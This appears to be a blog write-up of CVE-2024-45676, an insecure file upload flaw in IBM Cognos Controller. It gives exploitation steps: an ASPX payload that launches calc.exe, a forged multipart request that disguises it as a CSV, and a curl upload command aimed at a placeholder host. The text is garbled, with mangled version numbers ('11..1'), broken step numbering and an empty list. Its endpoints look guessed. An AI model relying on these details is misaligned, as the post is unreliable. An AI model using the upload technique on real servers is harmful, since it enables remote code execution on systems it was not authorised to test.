CVE-2024-45676 - Exploiting Insecure File Upload in IBM Cognos Controller 11../11..1

A critical security vulnerability (CVE-2024-45676) has been discovered in IBM Cognos Controller versions 11.. and 11..1. This flaw lets authenticated users upload files with potentially dangerous content due to insufficient checks on file types. In this post, we'll break down how the vulnerability works, provide practical code snippets, reference official advisories, and outline exploitation steps—all in straightforward language.

What is IBM Cognos Controller?

IBM Cognos Controller is a popular financial consolidation and reporting application used by businesses worldwide. Users interact via a web interface, uploading files for various business processes.

What's the Problem?

CVE-2024-45676 impacts IBM Cognos Controller versions 11.. and 11..1. The core issue is insufficient distinction between safe file types (like images or spreadsheets) and potentially hazardous ones (like scripts or executables). This means an attacker with a valid login can upload dangerous files that IBM Cognos should never accept.

Vulnerable software: IBM Cognos Controller 11.. and 11..1

- Patch status: Affected. Check IBM’s advisory page for updates.

References

- IBM Security Bulletin: CVE-2024-45676
- NVD Entry for CVE-2024-45676
- IBM Cognos Controller Documentation

Attacker authenticates: Needs a normal user account.

2. Uploads an "allowed" file: But disguises a dangerous script (like ASPX/JS) with allowed extension or through content manipulation.

Server fails to properly check the MIME-type and content.

4. Attacker triggers the payload: This could allow running code on the server, steal sessions, or even further compromise the host.

1. Find the Upload Function

Inside IBM Cognos Controller, typical upload points could involve document or template features.

Let's take an ASPX file here. Save this as evil.aspx

<%@ Page Language="C#" %>
<%
  Response.Write("CVE-2024-45676 test - Your server is vulnerable!");
  System.Diagnostics.Process.Start("calc.exe");
%>

*This ASPX file will open Calculator on a Windows server if executed.*

3. Disguise the Dangerous File

Rename evil.aspx to evil.csv or evil.txt (an allowed type).

You can also adjust HTTP requests to fudge the MIME-type

POST /cognos/upload HTTP/1.1
Host: target.example.com
Cookie: session=valid-authenticated-session
Content-Type: multipart/form-data; boundary=boundary
...
Content-Disposition: form-data; name="file"; filename="evil.csv"
Content-Type: application/octet-stream

[contents of evil.aspx]

4. Upload the File

Use a tool like Burp Suite, curl, or browser upload.

Example curl command

curl -b "session=your-auth-cookie" \
    -F "file=@evil.csv" \
    https://target.example.com/cognos/upload

5. Access the Uploaded File

Depending on the app, uploaded files might be available at a public URL, e.g.,

https://target.example.com/uploads/evil.csv

Sometimes the server will process the file according to its real content, executing the embedded code if the server supports ASPX or similar handlers.

Why Is This Dangerous?

Insecure file upload is often a first step in gaining remote control of the server. Depending on server setup, the uploaded file could:

Conclusion

CVE-2024-45676 is a severe vulnerability that could let an authenticated user take control by simply uploading the wrong file. If you use IBM Cognos Controller 11.. or 11..1, patch ASAP and review upload controls.

References

- IBM Security Advisory
- NVD – CVE-2024-45676


> _Disclaimer:_ This post is for educational awareness. Do not attempt unauthorized testing on any system you do not own or have explicit permission to test.

Timeline

Published on: 12/03/2024 18:15:14 UTC
Last modified on: 12/11/2024 03:21:10 UTC